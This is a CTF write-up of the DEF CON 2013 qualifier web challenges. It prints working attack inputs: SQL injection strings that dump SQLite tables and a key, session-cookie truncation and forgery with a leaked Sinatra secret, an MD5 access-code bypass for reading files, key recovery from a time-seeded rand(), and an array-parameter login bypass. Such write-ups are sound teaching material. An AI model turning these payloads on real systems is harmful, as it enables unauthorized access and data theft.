DEF CON CTF 2013 Quals - web writeups
I haven't played in a lot of CTF games. I used to register under a random nickname, take a look at the more interesting web challenges and try to solve them in a short period of time. It was like CTF
blitz. However, I decided to give playing CTFs properly a try. I joined a new team and took on
DEF CON CTF (of course, only in the web category). Here are my short writeups (published just after the competition ended) for the web challenges (also called 3dub).
babysfirst
It's just an easy SQL injection (the backend is an SQLite database). We can query sqlite_master to get the table and column names:
username=' or 1=1 union select sql from sqlite_master WHERE type='table'--
logged in as CREATE TABLE keys (value string)
And here's the way to get the flag:
username=' or 1=1 union select value from keys--
The key is: literally online lolling on line WucGesJi
badmedicine
We are able to log in as anyone except
admin. Every sign-in attempt creates a new cookie, which depends on the chosen login: one letter of the nickname sets two characters of the cookie. We shouldn't even try to guess how these cookies are generated. A much faster idea is to log in as
adminX, which gives us a new cookie: username=
09c8259ca076. All we have to do is remove the last two characters from it (the ones that correspond to the letter
X).
Using the cookie username=
09c8259ca0 gives us the flag:
The key is: who wants oatmeal raisin anyways twumpAdby
hypeman
While trying to get the admin's secret (/secrets/0), an error page is displayed. Let's take a look at it:
rack.session.options
{
:path=>"/",
:domain=>nil,
:expire_after=>nil,
:secure=>false,
:httponly=>true,
:defer=>false,
:renew=>false,
:sidbits=>128,
:secure_random=>SecureRandom,
:secret=>"wroashsoxDiculReejLykUssyifabEdGhovHabno",
:coder=>#<Rack::Session::Cookie::Base64::Marshal:0x000000034e2228>
}
rack.session.unpacked_cookie_data
{
"session_id"=>"6ef1fd11f31860a44f2846c776492c72a3c6ab7233e27ec2c64f8d8ccb9420b4",
"tracking"=>
{
"HTTP_USER_AGENT"=>"50767cb0bf2f1f10587db0e2eb5a1e32d0c887fd",
"HTTP_ACCEPT_ENCODING"=>"a0bfc876d68fe7aea700da5ea8925abac6f2f794",
"HTTP_ACCEPT_LANGUAGE"=>"e88e52a62f706f3c0ae7d4caaf8925434a837c9f"},
"csrf"=>"b688a1219c420e329efb59dfc33c111845d04641cfd140a32935e684ec722ab8",
"user_name"=>"xxxxxxxxx"
}
We just need to set up our own
Sinatra server, create a new admin cookie and sign it (we know the value of
:secret, and Sinatra's session_secret is exactly that value):
require 'sinatra'
enable :sessions
set :session_secret, "wroashsoxDiculReejLykUssyifabEdGhovHabno"
get '/' do
  # any request now hands back a cookie signed with the leaked secret
  session[:user_name] = 'admin'
  session[:csrf] = "b688a1219c420e329efb59dfc33c111845d04641cfd140a32935e684ec722ab8"
  'cookie set'
end
A little cookie tampering and the flag is ours:
watch out for this Etdeksogav
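To make explicit what the leaked :secret buys and what rotating it fixes, here is an added Ruby illustration (not code from the original post or from the challenge) that reconstructs the Rack 1.x cookie signing scheme behind Sinatra's sessions together with the matching verifier; ROTATED_SECRET and tampered_cookie are hypothetical.

```ruby
require 'openssl'

# Rack 1.x's Rack::Session::Cookie (what Sinatra's `enable :sessions` used)
# serialises the session hash with Marshal, Base64-encodes it, and appends
# "--" plus a hex HMAC-SHA1 of that Base64 text keyed with :secret.  This is a
# reconstruction of that scheme for illustration (older Rack wrapped the Base64
# at 60 columns; the signature still covers the whole data part either way).
LEAKED_SECRET  = "wroashsoxDiculReejLykUssyifabEdGhovHabno"  # shown on the error page
ROTATED_SECRET = "PLACEHOLDER-new-random-secret"             # hypothetical replacement

def sign_session(session, secret)
  data = [Marshal.dump(session)].pack('m0')   # strict Base64, no line breaks
  "#{data}--#{OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)}"
end

# Constant-time comparison so the verifier does not leak which byte mismatched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Mirrors Rack's check: recompute the HMAC over the data part and unmarshal
# only when it matches.  The secret is the sole thing standing between the
# client and arbitrary session content, which is why leaking it is fatal.
def verify_session(cookie, secret)
  data, digest = cookie.to_s.split('--', 2)
  return nil if data.nil? || digest.nil?
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
  return nil unless secure_equal?(digest, expected)
  Marshal.load(data.unpack1('m0'))
end

# A cookie signed for user xxxxxxxxx whose data part was edited afterwards
# without re-signing: the verifier must reject it.
def tampered_cookie(secret)
  cookie = sign_session({ "user_name" => "xxxxxxxxx" }, secret)
  _data, digest = cookie.split('--', 2)
  edited = [Marshal.dump({ "user_name" => "admin" })].pack('m0')
  "#{edited}--#{digest}"
end

if __FILE__ == $0
  forged = sign_session({ "user_name" => "admin" }, LEAKED_SECRET)
  p verify_session(forged, LEAKED_SECRET)     # accepted while the secret is unchanged
  p verify_session(forged, ROTATED_SECRET)    # nil: rotating the secret invalidates it
  p verify_session(tampered_cookie(LEAKED_SECRET), LEAKED_SECRET)  # nil
end
```

The practical lesson is the defensive one: a session secret that appears in any error page or repository must be treated as compromised and rotated, which invalidates every cookie minted with it.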
rememberme
It's easy to spot that md5('usernames.txt') = 60635c6862d44e8ac17dc5e144c66539.
Now we can very easily get access to other files. As
passwords.txt looks like a honeypot, we should forget about it and check
getfile.php itself:
getfile.php?filename=getfile.php&accesscode=md5('getfile.php')
getfile.php?filename=getfile.php&accesscode=0701593e23e676eaba834916a6ac7272
The source reveals that the file key.txt exists:
getfile.php?filename=key.txt&accesscode=65c2a527098e1f7747eec58e1925b453
The next lines of code reveal how the key hidden in key.txt is produced:
$value = time();
/* --- cut --- */
srand($value);
/* --- cut --- */
$key = rand();
$cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
That's all we need. We have the ciphertext (which is what
key.txt displays) that we need to decrypt, and we also know how the key is derived.
The value of the key can be easily recreated thanks to
srand(): a fixed seed makes
rand() return the same value on every run. Moreover, the seed here is
time(), and the value of
time() is known because we can check when the request that displayed the
key.txt content was sent. Even if we couldn't get the exact value, we could easily brute-force the small key space around that
time() value.
The next step is just
mcrypt_decrypt(), which reveals the flag:
To boldly go where no one has gone before WMx8reNS
worsemedicine
The fastest points ever. We are able to log in as anyone except admin.
Instead of sending a request like this:
_utf8=%26%23x2713%3B&verification=7734c700&username=admin&password=
we should "cheat" the challenge with this one (passing username as an array instead of a string):
_utf8=%26%23x2713%3B&verification=7734c700&username[]=admin&password=
Voilà!
The key is: computers downtown and computers up in harlem
Yeah, the web category is cleared!